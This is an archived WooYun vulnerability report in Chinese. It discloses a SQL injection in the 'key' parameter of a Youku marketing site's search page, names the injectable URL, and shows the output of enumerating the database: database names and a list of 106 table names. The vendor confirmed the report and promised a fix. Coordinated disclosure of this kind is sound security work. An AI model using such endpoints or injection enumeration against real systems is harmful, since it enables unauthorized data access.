乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-21: 细节已通知厂商并且等待厂商处理中 2014-04-21: 厂商已经确认,细节仅向厂商公开 2014-05-01: 细节向核心白帽子及相关领域专家公开 2014-05-11: 细节向普通白帽子公开 2014-05-21: 细节向实习白帽子公开 2014-06-05: 细节向公众公开
连发两弹,都没给个优酷会员~~~第三弹走起
问题出现在这个站
http://tide.youku.com/
注入链接:
http://tide.youku.com/search.php?key=1&t=1
由于对参数key没做过滤,造成sql注射
数据库:
available databases [3]:[*] 2013_gz[*] information_schema[*] test
当前库:2013_gz表:
Database: 2013_gz[106 tables]+------------------------+| 5gum_blacklist || 5gum_code || 5gum_code_dh || anerle_baby || anerle_egg || anerle_img || anerle_limitIP || anerle_work || bilang_infos || cgbxyk_infos || cgbxyk_vcodes || christmas_scores || ctf_iplog || ctf_products || ctf_videos || ctf_vote || ctf_vote2 || cy_present || cy_room || deerway_videos || dmg_videos || fings_project || flyscoot_award || flyscoot_award_bak1 || flyscoot_award_bak2 || flyscoot_award_bak3 || flyscoot_award_r || flyscoot_list || flyscoot_times || gz_admin_users || gz_module_app || gz_modules || huawei_mate_media || huawei_mate_visitor || jeanswest_comment || jeanswest_game || jeanswest_limitIP || jeanswest_play || jeanswest_province || jeanswest_qmhsy_video || jeanswest_score || jeanswest_shares || jeanswest_videos || jws_yc_gb || jws_yc_ht || jws_yc_hx || jws_yc_opus || jws_yc_video || jws_yc_vote || jws_yc_vote_ab || jws_yc_vote_m || lansur_vquestion || meiji_playCnt || meiji_user || minisite_limitIP || minisite_vote || module_find_count || module_find_q || module_lottery_infos || module_lottery_users || ninjiom_code || ninjiom_code_dh || ninjiom_code_opus || ninjiom_opus || ninjiom_record_setvote || ninjiom_setvote || ninjiom_users || ninjiom_vote || ninjiom_vote_aaa || ninjiom_vote_list || ninjiom_vote_record || nissan_photos || nissan_videos || nissan_vote_p || nissan_vote_v || olaydeeplove_counts || olaydeeplove_log || piaorou_works || pld_answer || pld_code || project_awards || project_config || project_operational || rwsmovie_userdata || sc10086_iplong || sc10086_lottery || sc10086_videos || shining_award_r || shining_list || shining_play || shining_play_no || shining_setNum || shining_times || tide_photos || tide_videos || tide_videos_test || yaris_survey || zhouss_count || zhouss_shares || zj_art || zj_article || zj_manager || zj_sharelog || zj_user || zj_votelog || zj_webconfig |+------------------------+
只是检测,所以就到此为止
你们懂的~~
危害等级:高
漏洞Rank:20
确认时间:2014-04-21 14:30
多谢提醒,马上修复。
暂无